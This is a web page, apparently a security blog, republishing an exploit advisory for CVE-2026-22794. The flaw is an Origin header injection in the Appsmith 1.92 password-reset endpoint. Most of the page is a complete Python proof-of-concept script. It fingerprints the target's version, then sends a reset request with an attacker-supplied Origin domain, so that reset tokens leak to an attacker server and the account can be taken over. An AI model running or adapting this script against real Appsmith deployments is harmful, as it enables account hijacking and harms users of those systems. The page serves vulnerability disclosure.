Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Appsmith 1.92 Origin Header Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 7
Appsmith 1.92 Origin Header Injection
Appsmith 1.92 Origin Header Injection
Appsmith 1.92 Origin Header Injection

=============================================================================================================================================
| # Title Appsmith 1.92 Origin Header Injection

=============================================================================================================================================
| # Title : Appsmith 1.92 Origin Header Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.appsmith.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214539/ & CVE-2026-22794

[+] Summary : A critical vulnerability in Appsmith (versions 1.92) allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process.
Due to improper trust in client?supplied headers, Appsmith constructs password reset links based on the injected origin. This enables an attacker to hijack password
reset tokens and perform full account takeover without authentication, simply by triggering a reset request for a known user email.
The issue affects the /api/v1/users/forgotPassword endpoint and can be exploited remotely.


[+] POC : python poc.py


#!/usr/bin/env python3

import argparse
import requests
import json
import re

def check_vulnerable(target_url):
headers = {
"User-Agent": "Mozilla/5.0 (compatible; ExploitPoC/1.0)"
}

try:
r = requests.get(
target_url.rstrip('/') + "/",
headers=headers,
timeout=10,
verify=False
)

if r.status_code == 200 and "Appsmith" in r.text:
version_match = re.search(
r"parseConfig\('v([0-9]+\.[0-9]+)'\)",
r.text
)

if version_match:
try:
version = float(version_match.group(1))
except ValueError:
print("[?] Version parsing failed - assuming vulnerable")
return True

if version <= 1.92:
print(f"[+] Target is vulnerable! Version: v{version}")
return True
else:
print(f"[-] Target is patched (version: v{version})")
return False
else:
print("[?] Version not found - assuming vulnerable if Appsmith detected")
return True
else:
print("[-] Not an Appsmith instance or unreachable")
return False

except Exception as e:
print(f"[-] Error checking: {e}")
return False


def exploit(target_url, email, evil_domain):
vuln_path = "/api/v1/users/forgotPassword"

headers = {
"Origin": f"https://{evil_domain}",
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (compatible; ExploitPoC/1.0)"
}

payload = {
"email": email
}

full_url = f"{target_url.rstrip('/')}{vuln_path}"

print(f"[*] Sending malicious reset request to: {full_url}")
print(f"[*] Target email: {email}")
print(f"[*] Injected Origin: https://{evil_domain}")

try:
r = requests.post(
full_url,
headers=headers,
json=payload,
timeout=10,
verify=False
)

if r.status_code in [200, 201, 202] and "success" in r.text.lower():
print(f"[+] Exploit succeeded! Status: {r.status_code}")
print(
f"[+] Check email for reset link ? it should point to your evil domain "
f"(e.g., https://{evil_domain}/... )"
)
print("[+] If user clicks, token leaks to your server ? takeover account.")

if r.text.strip():
try:
print("\nResponse body:\n" + "-" * 60)
print(json.dumps(r.json(), indent=4))
print("-" * 60)
except Exception:
print("[!] Response is not valid JSON")

else:
print(f"[-] Failed - Status: {r.status_code} (may be patched or invalid email)")
print(r.text[:500])

except Exception as e:
print(f"[-] Error: {e}")


if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="CVE-2026-22794 PoC - Appsmith Origin Injection by indoushka"
)
parser.add_argument(
"--target",
required=True,
help="Target Appsmith URL (e.g. https://appsmith.target.com)"
)
parser.add_argument(
"--email",
help="Target user email (e.g. This email address is being protected from spambots. You need JavaScript enabled to view it.) - required for exploit"
)
parser.add_argument(
"--evil_domain",
help="Your attacker domain (e.g. evil.com) - required for exploit"
)
parser.add_argument(
"--check",
action="store_true",
help="Check if vulnerable without exploiting"
)

args = parser.parse_args()

if args.check:
check_vulnerable(args.target)
else:
if not args.email or not args.evil_domain:
parser.error("--email and --evil_domain are required for exploitation")
exploit(args.target, args.email, args.evil_domain)

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

Social Media Share